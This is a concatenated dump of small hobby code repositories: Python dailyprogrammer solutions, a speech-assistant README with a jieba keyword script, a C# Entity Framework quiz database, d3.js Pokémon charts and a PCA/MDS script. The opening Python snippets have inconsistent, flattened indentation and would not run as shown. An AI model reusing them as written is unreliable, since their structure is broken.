wordList = re.findall(r'\w+', sentence)
reworkedSentence = ""
    for word in wordList:
        if len(word) < 3:  # too short to shuffle; avoids duplicating single letters
            reworkedSentence += word + " "
            continue
        newWord = ""
        newMiddle = ""
        firstLetter = word[0]
        middleLetters = word[1:(len(word)-1)]
middleList = list(middleLetters)
random.shuffle(middleList)
for char in middleList:
newMiddle += char
lastLetter = word[-1]
newWord += firstLetter
newWord += newMiddle
newWord += lastLetter
reworkedSentence += newWord + " "
print(reworkedSentence)
typo("According to a research team at Cambridge University, " +
"it doesn't matter in what order the letters in a word are, the only important thing is that the first and last letter be in the right place. " +
"The rest can be a total mess and you can still read it without a problem." +
"This is because the human mind does not read every letter by itself, but the word as a whole. " +
"Such a condition is appropriately called Typoglycemia.")
<file_sep>/#364 - Dice Roller [Easy].py
# https://old.reddit.com/r/dailyprogrammer/comments/8s0cy1/20180618_challenge_364_easy_create_a_dice_roller/
import re
import random
def rollDice(roll):
    matchObj = re.match(r'(\d+)d(\d+)', roll)
noOfDice = matchObj.group(1)
diceSize = matchObj.group(2)
print(noOfDice, diceSize)
diceSum = 0
rolls = list()
for i in range(int(noOfDice)):
rollNum = random.randint(1, int(diceSize))
diceSum += rollNum
rolls.append(rollNum)
print(diceSum, ":", rolls)
rollDice('6d4')<file_sep>/#361 - Tally Program [Easy].py
# https://old.reddit.com/r/dailyprogrammer/comments/8jcffg/20180514_challenge_361_easy_tally_program/
def tally(scoreTrack):
scoreTrack = list(scoreTrack)
print(scoreTrack)
scoreBoard = dict()
for char in scoreTrack:
        if char.islower():
            if char not in scoreBoard:
                scoreBoard[char] = 0
            scoreBoard[char] += 1
if char.isupper():
if char.lower() not in scoreBoard:
scoreBoard[char.lower()] = 0
scoreBoard[char.lower()] -= 1
print(scoreBoard)
tally("EbAAdbBEaBaaBBdAccbeebaec")
<file_sep>/#275 - Splurthian Chemistry 101 [Easy].py
# https://www.reddit.com/r/dailyprogrammer/comments/4savyr/20160711_challenge_275_easy_splurthian_chemistry/
def verifySymbol(chemical, symbol):
    chemical = chemical.lower()
    symbol = symbol.lower()
    first = chemical.find(symbol[0])
    # both letters must occur, and the second must come after the first;
    # find() returns -1 instead of raising like index() does
    if first >= 0 and chemical.find(symbol[1], first + 1) >= 0:
        print(chemical, ",", symbol, "-> true")
    else:
        print(chemical, ",", symbol, "-> false")
verifySymbol("Venkmine", "Kn")
|
1b4241da7525759f9aa88e81b6df31a4b6b2fa67
|
[
"Python"
] | 22 |
Python
|
Jy411/Dailies
|
6dad3039834ef09bee40c7b47093fb5c5abe17aa
|
64d92c030c829083b3819083a917a4390ce2ce65
|
refs/heads/master
|
<repo_name>williamsriver/SpeechCreative<file_sep>/readme.txt
hello! Welcome to the Classroom Speech Assistant, version 0.0.1
Main features:
1. Recording:
1) Double-click to run 录音.exe
2) Recording starts immediately and runs until the generated text and "Press Any Key to Continue" appear in the command line; then it can be closed
3) The generated transcript is saved as example.txt in the same directory
2. Keyword extraction:
1) Put the generated text into the PythonApplication1\text folder
2) Open and run "PythonApplication1.sln" with Visual Studio
3) A Look.txt file containing the text's keywords is generated automatically in the PythonApplication1\text folder
———————————divider——————————
Note: this is the current version; the keyword feature is not yet complete. Stay tuned for version 0.0.2!<file_sep>/PythonApplication1/text/PythonApplication1.py
# 基于TF-IDF算法的关键词抽取
import jieba
import jieba.analyse
f = open('example.txt', mode='r', encoding='utf-8')
sentence=f.read()
f.close()
keywords = jieba.analyse.extract_tags(sentence, topK=20, withWeight=True, allowPOS=('n','nr','ns'))
# print(type(keywords))
# <class 'list'>
f = open("look.txt", 'a')
f.seek(0)
f.truncate()
for item in keywords: f.write(item[0]+'\n')
f.close()
|
78ecd0bb8fc56181018a711f3d630de255cd18e6
|
[
"Python",
"Text"
] | 2 |
Text
|
williamsriver/SpeechCreative
|
eeb0a88043a9e54bd616425c45440d7e798eb47f
|
92ca67952a9ddc4badebca51747d6b72190b037f
|
refs/heads/master
|
<file_sep>using MyEntity.Entity;
using System.Collections.Generic;
using System.Linq;
using System;
namespace MyEntity.Query
{
public class TestsQuery
{
private static ICollection<Tests> tt;
public static void ShowTests()
{
tt = new List<Tests>
{
new Tests
{
Name = "for .Net students",
Category = ".Net",
TimeMax = 30,
ListAsk = "What is a class?",
Pass = 38
},
new Tests
{
Name = "for JS students",
Category = "JS",
TimeMax = 30,
ListAsk = "What is a class?",
Pass = 50
},
new Tests
{
Name = "for PHP students",
Category = "PHP",
TimeMax = 30,
ListAsk="What is a HTML?",
Pass = 25
},
new Tests
{
Name = "for DB students",
Category = "DB",
TimeMax = 25,
ListAsk="What is a DataBase?",
Pass = 20
},
};
using (var db = new MyContext())
{
var ak = new List<Ask>
{
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a class?"
},
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a class?"
},
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a HTML?"
},
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a DataBase?"
},
};
db.ask.AddRange(ak);
db.test.AddRange(tt);
db.SaveChanges();
Console.WriteLine("Popularity rating questions in tests");
/*var result = db.ask.Select(item => new { Ask = item.NameAsk, CategoryCount = item.Category.Count() });
foreach (var tst in result)
{
Console.WriteLine(tst);
}*/
}
}
}
}
<file_sep>
namespace MyEntity.Entity
{
class DoTest
{
public int DoTestID { get; set; }
public string Name { get; set; }
public int UserID { get; set; }
public int Result { get; set; }
public int Time { get; set; }
public Tests Tests { get; set; }
public Users Users { get; set; }
}
}
<file_sep>using System.Collections.Generic;
namespace MyEntity.Entity
{
class Lecture
{
public int LectureID { get; set; }
public int TeacherID { get; set; }
public string Name { get; set; }
public string Category { get; set; }
public string Discriptions { get; set; }
public ICollection<Teacher> Teacher { get; set; }
public Lecture()
{
this.Teacher = new List<Teacher>();
}
}
}
<file_sep>namespace MyEntity.Migrations
{
using System;
using System.Data.Entity.Migrations;
public partial class fsb : DbMigration
{
public override void Up()
{
CreateTable(
"dbo.Asks",
c => new
{
AskID = c.Int(nullable: false, identity: true),
Category = c.String(),
NameAsk = c.String(),
})
.PrimaryKey(t => t.AskID);
CreateTable(
"dbo.Tests",
c => new
{
TestID = c.Int(nullable: false, identity: true),
Name = c.String(),
Category = c.String(),
ListAsk = c.String(),
TimeMax = c.Int(nullable: false),
Pass = c.Int(nullable: false),
User_UserID = c.Int(),
})
.PrimaryKey(t => t.TestID)
.ForeignKey("dbo.Users", t => t.User_UserID)
.Index(t => t.User_UserID);
CreateTable(
"dbo.Users",
c => new
{
UserID = c.Int(nullable: false, identity: true),
Name = c.String(),
Age = c.Int(nullable: false),
City = c.String(),
University = c.String(),
Category = c.String(),
})
.PrimaryKey(t => t.UserID);
CreateTable(
"dbo.DoTests",
c => new
{
DoTestID = c.Int(nullable: false, identity: true),
Name = c.String(),
UserID = c.Int(nullable: false),
Result = c.Int(nullable: false),
Time = c.Int(nullable: false),
Tests_TestID = c.Int(),
})
.PrimaryKey(t => t.DoTestID)
.ForeignKey("dbo.Tests", t => t.Tests_TestID)
.ForeignKey("dbo.Users", t => t.UserID, cascadeDelete: true)
.Index(t => t.UserID)
.Index(t => t.Tests_TestID);
CreateTable(
"dbo.Categories",
c => new
{
CategoryID = c.Int(nullable: false, identity: true),
Name = c.String(),
})
.PrimaryKey(t => t.CategoryID);
CreateTable(
"dbo.Lectures",
c => new
{
LectureID = c.Int(nullable: false, identity: true),
TeacherID = c.Int(nullable: false),
Name = c.String(),
Category = c.String(),
Discriptions = c.String(),
})
.PrimaryKey(t => t.LectureID);
CreateTable(
"dbo.Teachers",
c => new
{
TeacherID = c.Int(nullable: false, identity: true),
Name = c.String(),
})
.PrimaryKey(t => t.TeacherID);
CreateTable(
"dbo.TestsAsks",
c => new
{
Tests_TestID = c.Int(nullable: false),
Ask_AskID = c.Int(nullable: false),
})
.PrimaryKey(t => new { t.Tests_TestID, t.Ask_AskID })
.ForeignKey("dbo.Tests", t => t.Tests_TestID, cascadeDelete: true)
.ForeignKey("dbo.Asks", t => t.Ask_AskID, cascadeDelete: true)
.Index(t => t.Tests_TestID)
.Index(t => t.Ask_AskID);
CreateTable(
"dbo.TeacherLectures",
c => new
{
Teacher_TeacherID = c.Int(nullable: false),
Lecture_LectureID = c.Int(nullable: false),
})
.PrimaryKey(t => new { t.Teacher_TeacherID, t.Lecture_LectureID })
.ForeignKey("dbo.Teachers", t => t.Teacher_TeacherID, cascadeDelete: true)
.ForeignKey("dbo.Lectures", t => t.Lecture_LectureID, cascadeDelete: true)
.Index(t => t.Teacher_TeacherID)
.Index(t => t.Lecture_LectureID);
}
public override void Down()
{
DropForeignKey("dbo.TeacherLectures", "Lecture_LectureID", "dbo.Lectures");
DropForeignKey("dbo.TeacherLectures", "Teacher_TeacherID", "dbo.Teachers");
DropForeignKey("dbo.Tests", "User_UserID", "dbo.Users");
DropForeignKey("dbo.DoTests", "UserID", "dbo.Users");
DropForeignKey("dbo.DoTests", "Tests_TestID", "dbo.Tests");
DropForeignKey("dbo.TestsAsks", "Ask_AskID", "dbo.Asks");
DropForeignKey("dbo.TestsAsks", "Tests_TestID", "dbo.Tests");
DropIndex("dbo.TeacherLectures", new[] { "Lecture_LectureID" });
DropIndex("dbo.TeacherLectures", new[] { "Teacher_TeacherID" });
DropIndex("dbo.TestsAsks", new[] { "Ask_AskID" });
DropIndex("dbo.TestsAsks", new[] { "Tests_TestID" });
DropIndex("dbo.DoTests", new[] { "Tests_TestID" });
DropIndex("dbo.DoTests", new[] { "UserID" });
DropIndex("dbo.Tests", new[] { "User_UserID" });
DropTable("dbo.TeacherLectures");
DropTable("dbo.TestsAsks");
DropTable("dbo.Teachers");
DropTable("dbo.Lectures");
DropTable("dbo.Categories");
DropTable("dbo.DoTests");
DropTable("dbo.Users");
DropTable("dbo.Tests");
DropTable("dbo.Asks");
}
}
}
<file_sep>using MyEntity.Entity;
using MyEntity.Query;
using System;
namespace MyEntity
{
class Program
{
static void Main(string[] args)
{
UsersQuery.ShowUsers();
TestsQuery.ShowTests();
DoTestQuery.ShowDoTest();
TeacherQuery.ShowTeacher();
Console.ReadKey();
}
}
}
<file_sep>using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
namespace MyEntity.Entity
{
class Tests
{
[Key]
public int TestID { get; set; }
public string Name { get; set; }
public string Category { get; set; }
public string ListAsk { get; set; }
public int TimeMax { get; set; }
public int Pass { get; set; }
public Users User { get; set; }
public ICollection<Ask> Ask { get; set; }
public Tests()
{
this.Ask = new List<Ask>();
}
}
}
<file_sep>using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
namespace MyEntity.Entity
{
class Users
{
[Key]
public int UserID { get; set; }
public string Name { get; set; }
public int Age { get; set; }
public string City { get; set; }
public string University { get; set; }
public string Category { get; set; }
public ICollection<DoTest> DoTest { get; set; }
public Users()
{
this.DoTest = new List<DoTest>();
}
}
}
<file_sep># BSA-ORM
<file_sep>using System.Collections.Generic;
namespace MyEntity.Entity
{
class Teacher
{
public int TeacherID { get; set; }
public string Name { get; set; }
public ICollection<Lecture> Lecture { get; set; }
public Teacher()
{
this.Lecture = new List<Lecture>();
}
}
}
<file_sep>using MyEntity.Entity;
using System;
using System.Collections.Generic;
using System.Data.Entity;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace MyEntity
{
class MyContext : DbContext
{
public MyContext() : base("MyDB")
{
}
public DbSet<Users> user { get; set; }
public DbSet<Tests> test { get; set; }
public DbSet<Ask> ask { get; set; }
public DbSet<DoTest> testdo { get; set; }
public DbSet<Teacher> teachers { get; set; }
public DbSet<Lecture> lect { get; set; }
public DbSet<Category> categ { get; set; }
}
}
<file_sep>using System.Collections.Generic;
using System.Linq;
using MyEntity.Entity;
using System;
namespace MyEntity.Query
{
public class TeacherQuery
{
private static ICollection<Lecture> lc;
public static void ShowTeacher()
{
lc = new List<Lecture>
{
new Lecture
{
Name = "Lecture 1",
Category=".Net",
Discriptions="OOP"
},
new Lecture
{
Name = "Lecture 2",
Category="JS",
Discriptions="HTML5"
},
new Lecture
{
Name = "Lecture 3",
Category="PHP",
Discriptions="HTML"
},
};
using (var db = new MyContext())
{
var tc = new List<Teacher>
{
new Teacher
{
Name = "<NAME>",
Lecture = lc
},
new Teacher
{
Name = "<NAME>",
Lecture = lc
},
new Teacher
{
Name = "<NAME>",
Lecture = lc
}
};
db.teachers.AddRange(tc);
db.SaveChanges();
Console.WriteLine("Rating teachers on the number of lectures");
var result = db.teachers.Select(item => new { Teacher = item.Name, LectureCount = item.Lecture.Count() });
foreach (var tst in result)
{
Console.WriteLine(tst);
}
}
}
}
}
<file_sep>using MyEntity.Entity;
using System;
using System.Linq;
using System.Collections.Generic;
namespace MyEntity.Query
{
public class UsersQuery
{
private static ICollection<DoTest> dts;
public static void ShowUsers()
{
using (var db = new MyContext())
{
var us = new List<Users>
{
new Users
{
Name = "Yaroslav",
Age = 26,
City = "Lviv",
University = "LDFA",
Category = ".Net",
DoTest = dts
},
new Users
{
Name = "Oleg",
Age = 23,
City = "Lviv",
University = "LP",
Category = ".Net",
DoTest = dts
},
new Users
{
Name = "Taras",
Age = 21,
City = "Kiev",
University = "KNP",
Category = "JS",
DoTest = dts
},
new Users
{
Name = "Igor",
Age = 22,
City = "Kiev",
University = "LP",
Category = "PHP",
DoTest = dts
},
new Users
{
Name = "Oleg",
Age = 23,
City = "Donetsk",
University = "DNI",
Category = "JS",
DoTest = dts
},
new Users
{
Name = "Dima",
Age = 21,
City = "Kiev",
University = "KPI",
Category = "DB",
DoTest = dts
},
};
db.user.AddRange(us);
db.SaveChanges();
Console.WriteLine("List of cities");
db.user.GroupBy(u => u.City).ToList().ForEach(user => Console.WriteLine(user.Key + " " + user.Count()));
}
}
}
}
<file_sep>using MyEntity.Entity;
using System.Collections.Generic;
using System.Linq;
using System;
namespace MyEntity.Query
{
public class TestsQuery
{
private static ICollection<Tests> tt;
public static void ShowTests()
{
tt = new List<Tests>
{
new Tests
{
Name = "for .Net students",
Category = ".Net",
TimeMax = 30,
ListAsk = "What is a class?",
Pass = 38
},
new Tests
{
Name = "for JS students",
Category = "JS",
TimeMax = 30,
ListAsk = "What is a class?",
Pass = 50
},
new Tests
{
Name = "for PHP students",
Category = "PHP",
TimeMax = 30,
ListAsk="What is a HTML?",
Pass = 25
},
new Tests
{
Name = "for DB students",
Category = "DB",
TimeMax = 25,
ListAsk="What is a DataBase?",
Pass = 20
},
};
using (var db = new MyContext())
{
var ak = new List<Ask>
{
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a class?",
Tests=new List<Tests>{tt.FirstOrDefault(item => item.Category == "JS") }
},
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a class?",
Tests=new List<Tests>{tt.FirstOrDefault(item => item.Category == ".Net") }
},
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a HTML?",
Tests=new List<Tests>{tt.FirstOrDefault(item => item.Category == "PHP") }
},
new Ask
{
Category=tt.FirstOrDefault().Category,
NameAsk = "What is a DataBase?",
Tests=new List<Tests>{tt.FirstOrDefault(item => item.Category == "DB") }
},
};
db.ask.AddRange(ak);
db.test.AddRange(tt);
db.SaveChanges();
Console.WriteLine("Popularity rating questions in tests");
                var result = db.ask.Select(item => new { Ask = item.NameAsk, TestCount = item.Tests.Count() });
foreach (var tst in result)
{
Console.WriteLine(tst);
}
Console.WriteLine("Average test by Category");
                var r = from t in tt group t by t.Category into grouped select new { Category = grouped.Key, Average = grouped.Average(x => x.Pass) };
foreach (var rt in r)
{
Console.WriteLine(rt);
}
}
}
}
}
<file_sep>using MyEntity.Entity;
using System;
using System.Collections.Generic;
using System.Linq;
namespace MyEntity.Query
{
public class DoTestQuery
{
private static Tests tt;
public static void ShowDoTest()
{
using (var db = new MyContext())
{
var users = db.user.Select(item => item).ToList();
var dts = new List<DoTest>
{
new DoTest
{
Name = ".Net",
UserID = users[0].UserID,
Result = 30,
Time = 25,
Tests = tt,
},
new DoTest
{
Name = "JS",
UserID = users[1].UserID,
Result = 12,
Time = 50,
Tests = tt,
},
new DoTest
{
Name = ".Net",
UserID = users[2].UserID,
Result = 22,
Time = 15,
Tests = tt,
},
new DoTest
{
Name = "DB",
UserID = users[3].UserID,
Result = 26,
Time = 15,
Tests = tt,
},
new DoTest
{
Name = "JS",
UserID = users[4].UserID,
Result = 25,
Time = 15,
Tests = tt,
}
};
db.testdo.AddRange(dts);
db.SaveChanges();
var some = db.testdo.Select(item => item).ToList();
Console.WriteLine("List of people who have passed the tests");
var listTest = (from DoTest in dts where DoTest.Result > 22 select DoTest.UserID);
foreach (var test in listTest)
{
Console.WriteLine(test);
}
Console.WriteLine("Members who passed their tests within the time limit");
var listTest2 = (from DoTest in dts where DoTest.Result > 22 && DoTest.Time <= 20 select DoTest.UserID);
foreach (var test2 in listTest2)
{
Console.WriteLine(test2);
}
Console.WriteLine("Members who passed their tests but exceeded the time limit");
var listTest3 = (from DoTest in dts where DoTest.Result > 22 && DoTest.Time >= 20 select DoTest.UserID);
foreach (var test3 in listTest3)
{
Console.WriteLine(test3);
}
Console.WriteLine("List of successful students by city");
var newResult = db.testdo.Where(item => item.Result > 22).GroupBy(s => s.Users.City, (key, g) => new { City = key, Count = g.Count() });
foreach (var test in newResult)
{
Console.WriteLine(test.City + ": " + test.Count);
}
Console.WriteLine("The result for each student");
var rrr = (from DoTest in dts where DoTest.Result > 0 && DoTest.Time > 0 select new { DoTest.Result,DoTest.Time, DoTest.UserID});
foreach (var rt in rrr)
{
Console.WriteLine(rt);
}
}
}
}
}
<file_sep>
using System.Collections.Generic;
namespace MyEntity.Entity
{
class Ask
{
public int AskID { get; set; }
public string Category { get; set; }
public string NameAsk { get; set; }
public ICollection<Tests> Tests { get; set; }
public Ask()
{
this.Tests = new List<Tests>();
}
}
}
|
7249ebade6565076e977887745346832d49d7a8d
|
[
"Markdown",
"C#"
] | 15 |
C#
|
Budzyn/BSA-ORM
|
9d04f1d2698ebbffe6298c261de8f51dbd56cbec
|
34fcb849e02a8332a69376c79f57ca9b8cb35c5a
|
refs/heads/master
|
<file_sep>var data = [];
var svg;
var headers = [
"Total",
"HP",
"Attack",
"Defense",
"SpAtk",
"SpDef",
"Speed",
"Legendary",
"Male",
"Female"
];
var margin = {top: 20, right: 20, bottom: 30, left: 60};
var width = 1000 - margin.left - margin.right;
var height = 700 - margin.top - margin.bottom;
window.onload = function () {
svg = d3.select("#content").append("svg")
.attr("width", 1000).attr("height", 700)
.attr("id", "svg");
d3.csv("../Files/correlations.csv", function (csv) {
// Convert numerical values to numbers
csv.forEach(function(d) {
d.Total = +d.Total;
d.HP = +d.HP;
d.Attack = +d.Attack;
d.Defense = +d.Defense;
d.SpAtk = +d.SpAtk;
d.SpDef = +d.SpDef;
d.Speed = +d.Speed;
d.Legendary = +d.Legendary;
d.Male = +d.Male;
d.Female = +d.Female;
});
data = csv;
plot();
});
}
var plot = function() {
// d3 v4: padding is set via .padding(), not as a second argument to range()
var x = d3.scaleBand().domain(headers).range([0, width]).padding(.1);
var xGrid = d3.scalePoint().domain(headers).range([0, width]).padding(.1);
var xAxis = d3.axisBottom().scale(x);
var xGridAxis = d3.axisBottom().scale(xGrid);
var y = d3.scaleBand().domain(headers).range([0, height]).padding(.1);
var yGrid = d3.scalePoint().domain(headers).range([0, height]).padding(.1);
var yAxis = d3.axisLeft().scale(y);
var yGridAxis = d3.axisLeft().scale(yGrid);
// add graph to canvas
var g = svg.append("g").attr("transform","translate(" + margin.left + "," + margin.top + ")");
//x-axis
g.append("g").attr("class", "xaxis")
.attr("transform", "translate(0," + height + ")")
.call(xAxis);
/*
g.append("g").attr("class", "grid")
.attr("transform", "translate(0," + height + ")")
.call(xGridAxis.tickSize(-height,0,0).tickFormat(""));
*/
// y-axis
g.append("g")
.attr("class", "yaxis")
.call(yAxis);
/*
g.append("g")
.attr("class", "grid")
.call(yGridAxis.tickSize(-width, 0 , 0).tickFormat(""));
*/
var dataMatrix = [];
data.forEach(function (a, x) {
data.forEach(function(b, y) {
dataMatrix.push({a:a, b:b, x:x, y:y});
});
});
g.selectAll("g.corr")
.data(dataMatrix)
.enter()
.append("g")
.attr("transform", function (d) {
return "translate(" + (d.x * width/10) + "," + (d.y * height/10) + ")";
}).attr("class", "corr");
g.selectAll("g.corr").each(function (matrix, i) {
d3.select(this).append("rect").style("stroke", "#fff").attr("height", height/10)
.attr("width", width/10).style("fill", "white");
d3.select(this).append("rect").attr("height", height/10).attr("width", width/10)
.style("fill", function () {
var d = data[Math.floor(i/10)][headers[i%10]];
var value = Math.round(Math.abs(d)*255);
if(d>0) {
//return "rgb(" + value + ", 0, 0 )";
return "red";
}
else {
//return "rgb(0, 0, " + value + ")";
return "blue";
}
}).style("opacity", function() {
var d = data[Math.floor(i/10)][headers[i%10]];
return Math.abs(d);
});
});
$("<div></div>").attr("id", "grad").appendTo("#content");
$("<span></span>").text("-1").attr("class", "legend").appendTo("#grad");
$("<span></span>").text("1").attr("class", "legend").attr("style", "float: right").appendTo("#grad");
}<file_sep>var data = [];
var svg;
var svgScree;
var tooltip;
var types = [
"Normal",
"Fire",
"Fighting",
"Water",
"Grass",
"Flying",
"Poison",
"Electric",
"Ground",
"Psychic",
"Rock",
"Ice",
"Bug",
"Dragon",
"Ghost",
"Dark",
"Steel",
"Fairy"
];
var margin = {top: 20, right: 20, bottom: 30, left: 40};
var width = 1000 - margin.left - margin.right;
var height = 700 - margin.top - margin.bottom;
window.onload = function () {
svg = d3.select("#pcaplot").append("svg")
.attr("width", 1000).attr("height", 700)
.attr("id", "svg");
svgScree = d3.select("#scree").append("svg")
.attr("width", 1000).attr("height", 700)
.attr("id", "svg");
tooltip = d3.select("#pcaplot").append("div")
.attr("class", "tooltip").style("opacity", 0);
d3.csv("../Files/pca.csv", function (csv) {
// Convert numerical values to numbers
csv.forEach(function(d) {
d.PCA1 = +d.PCA1;
d.PCA2 = +d.PCA2;
});
data = csv;
plot("PCA1", "PCA2");
show();
});
}
plot = function (attr1, attr2) {
// functions to set up x
var xValue = function(d) {
return d[attr1];
};
var xScale = d3.scaleLinear().range([0, width]),
xMap = function(d) {
return xScale(xValue(d));
},
xAxis = d3.axisBottom().scale(xScale);
// functions to set up y
var yValue = function(d) {
return d[attr2];
}
var yScale = d3.scaleLinear().range([height, 0]),
yMap = function(d) {
return yScale(yValue(d));
},
yAxis = d3.axisLeft().scale(yScale);
// add graph to canvas
var g = svg.append("g").attr("transform","translate(" + margin.left + "," + margin.top + ")");
// Dots won't overlap axis with these buffers
xScale.domain([d3.min(data, xValue)-1, d3.max(data, xValue)+1]);
yScale.domain([d3.min(data, yValue)-1, d3.max(data, yValue)+1]);
//x-axis
g.append("g").attr("class", "xaxis")
.attr("transform", "translate(0," + height + ")")
.call(xAxis)
.append("text")
.attr("class", "label")
.attr("x", width)
.attr("y", -6)
.style("text-anchor", "end")
.text(attr1);
// y-axis
g.append("g")
.attr("class", "yaxis")
.call(yAxis)
.append("text")
.attr("class", "label")
.attr("transform", "rotate(-90)")
.attr("y", 6)
.attr("dy", ".71em")
.style("text-anchor", "end")
.text(attr2);
// draw dots
g.selectAll(".dot")
.data(data)
.enter().append("circle")
.attr("class", function(d) {
return "dot " + d.Type1;
})
.attr("r", 3.5)
.attr("cx", xMap)
.attr("cy", yMap)
.on("mouseover", function(d) {
tooltip.transition()
.duration(200)
.style("opacity", .9);
tooltip.html(d.Name + "<br />" + attr1 + ": " + d[attr1] + "<br />" + attr2 +": " + d[attr2] )
.style("left", (d3.event.pageX + 5) + "px")
.style("top", (d3.event.pageY - 28) + "px");
})
.on("mouseout", function(d) {
tooltip.transition()
.duration(500)
.style("opacity", 0);
});
}
var getHeight = function(value) {
if (value > 10000) {
return value / 30;
}
else if (value > 1000) {
return value / 5;
}
else if (value > 100) {
return value / 5;
}
else if (value < 1) {
return value * 100;
}
else {
return value;
}
}
var show = function () {
d3.csv("../Files/eigenvalues.csv", function (data) {
var heightArray = [];
data.forEach(function(d) {
d.Value = parseFloat(d.Value);
heightArray.push(getHeight(d.Value));
});
var yValue = function(d) {
return d;
}
var yScale = d3.scaleLinear().range([height, 0]),
yMap = function(d) {
return yScale(yValue(d));
},
yAxis = d3.axisLeft().scale(yScale);
// add graph to canvas
var g = svgScree.append("g").attr("transform","translate(" + margin.left + "," + margin.top + ")");
yScale.domain([d3.min(heightArray, yValue)-1, d3.max(heightArray, yValue)+1]);
g.selectAll("rect").data(heightArray)
.enter()
.append("rect").attr("width", 45)
.attr("height", function (d) { return d; })
.attr("x", function (d, i) { return i*45 + 10*i + 7; })
.attr("class", "bar")
.attr("y", function (d) {
return svgScree.attr("height") - d - 50;
});
/*
g.selectAll("text")
.data(heightArray)
.enter()
.append("text")
.text(function(d, i) {
return data[i].Value;
})
.attr("x", function (d, i) { return i*45 + 10*i + 7 + 22; })
.attr("y", function (d, i) { return svgScree.attr("height") - d - 50 -3; })
.attr("text-anchor", "middle")
.attr("class", "tip");
*/
});
}
<file_sep>// Total -> SpAtk -> SpDef -> Defense -> Attack -> HP ->
// Legendary -> Female -> Speed -> Male
var data = [];
var svg;
var attributes = [
"Total",
"SpAtk",
"SpDef",
"Defense",
"Attack",
"HP",
"Legendary",
"Female",
"Speed",
"Male"
];
var types = [
"Normal",
"Fire",
"Fighting",
"Water",
"Grass",
"Flying",
"Poison",
"Electric",
"Ground",
"Psychic",
"Rock",
"Ice",
"Bug",
"Dragon",
"Ghost",
"Dark",
"Steel",
"Fairy"
];
var margin = {top: 40, right: 20, bottom: 30, left: 40};
var width = 1500 - margin.left - margin.right;
var height = 700 - margin.top - margin.bottom;
window.onload = function () {
$("<option />").val(null).text("None").appendTo("#filterSelect");
for (var i = 0; i < types.length; i++) {
$("<option />").val(types[i]).text(types[i]).appendTo("#filterSelect");
}
$("#filterSelect").change(function (){
filterTypes($(this).val());
});
svg = d3.select("#content").append("svg")
.attr("width", 1500).attr("height", 700) .attr("id", "svg")
.append("g")
.attr("transform", "translate(" + margin.left + "," + margin.top + ")");
d3.csv("../Files/Pokemon.csv", function (csv) {
// Convert numerical values to numbers
csv.forEach(function(d) {
d.Total = +d.Total;
d.HP = +d.HP;
d.Attack = +d.Attack;
d.Defense = +d.Defense;
d.SpAtk = +d.SpAtk;
d.SpDef = +d.SpDef;
d.Speed = +d.Speed;
d.Generation = +d.Generation;
d.Male = +d.Male;
d.Female = +d.Female;
d.Index = +d.Index;
d.Pnum = +d.Pnum;
});
data = csv;
plot();
});
}
var line = d3.line();
var dragging = {};
var x = d3.scalePoint().range([0, width]).padding(1); // d3 v4: padding is a method, not a second range() argument
var y = {};
var plot = function() {
var axis = d3.axisLeft();
var foreground;
// Get list of dimensions and scale for each
x.domain(dimensions = d3.keys(data[0]).filter(function(d) {
return attributes.includes(d) && (y[d] = d3.scaleLinear()
.domain(d3.extent(data, function(p) {
return +p[d];
}))
.range([height, 0]));
}));
foreground = svg.append("g")
.attr("class", "foreground")
.selectAll("path")
.data(data)
.enter().append("path")
.attr("class", function(d) {
return d.Type1 + " " + d.Type2;
})
.attr("d", path);
// Add a group element for each dimension.
var g = svg.selectAll(".dimension")
.data(dimensions)
.enter().append("g")
.attr("class", "dimension")
.attr("transform", function(d) { return "translate(" + x(d) + ")"; });
// Add an axis and title.
g.append("g")
.attr("class", "axis")
.each(function(d) { d3.select(this).call(axis.scale(y[d])); })
.append("text")
.style("text-anchor", "middle")
.attr("y", -9)
.text(function(d) { return d; });
}
function position(d) {
var v = dragging[d];
return v == null ? x(d) : v;
}
function transition(g) {
return g.transition().duration(500);
}
// Returns the path for a given data point.
function path(d) {
return line(dimensions.map(function(p) { return [position(p), y[p](d[p])]; }));
}
function filterTypes(type) {
if (!type) {
for (var i = 0; i < types.length; i++) {
$("." + types[i]).attr("style", "opacity: 1; stroke-width: 1px;");
}
return;
}
for (var i = 0; i < types.length; i++) {
if (type != types[i])
$("." + types[i]).attr("style", "opacity: .1; stroke-width: 1px;");
}
$("." + type).attr("style", "opacity: 1; stroke-width: 3px;")
}<file_sep>import numpy as np
import pandas as pd
from sklearn import manifold
from sklearn.decomposition import PCA
from sklearn.metrics.pairwise import euclidean_distances
input_file = "Pokemon.csv"
df = pd.read_csv(input_file, header=0)
original_headers = list(df.columns.values)
df = df._get_numeric_data()
numpy_array = df.as_matrix()
numpy_array = np.delete(numpy_array, 0, 1)
numpy_array = np.delete(numpy_array, 0, 1)
numpy_array = np.delete(numpy_array, 7, 1)
X = numpy_array
pca = PCA(n_components=2)
pca.fit(X)
Xco = np.dot(X, pca.components_[0])
Yco = np.dot(X, pca.components_[1])
pcaPlotCo = np.column_stack((Xco, Yco))
euc = euclidean_distances(pcaPlotCo)
mds = manifold.MDS(n_components=2, dissimilarity='precomputed')
pos = mds.fit(euc)
np.savetxt("mds.csv", pos.embedding_, delimiter=",")
print(pos.embedding_)<file_sep>var csv = [];
var svg;
var svgType;
var svgGen;
var types = [
"Normal",
"Fire",
"Fighting",
"Water",
"Grass",
"Flying",
"Poison",
"Electric",
"Ground",
"Psychic",
"Rock",
"Ice",
"Bug",
"Dragon",
"Ghost",
"Dark",
"Steel",
"Fairy"
];
var gens = [
1, 2, 3, 4, 5, 6
];
window.onload = function () {
$("#attrForm").change(function () {
$(this).val($("input[name='attr']:checked").val());
$("#attrTitle").text($("input[name='attr']:checked").val());
show();
});
$("#binForm").change(function () {
$(this).val($("input[name='bin']:checked").val());
$("#binTitle").text($("input[name='bin']:checked").val());
show();
});
svgType = d3.select("#content").append("svg")
.attr("width", 1000).attr("height", 700)
.attr("id", "svgType")
.on("click", nextAttr);
svgGen = d3.select("#content").append("svg")
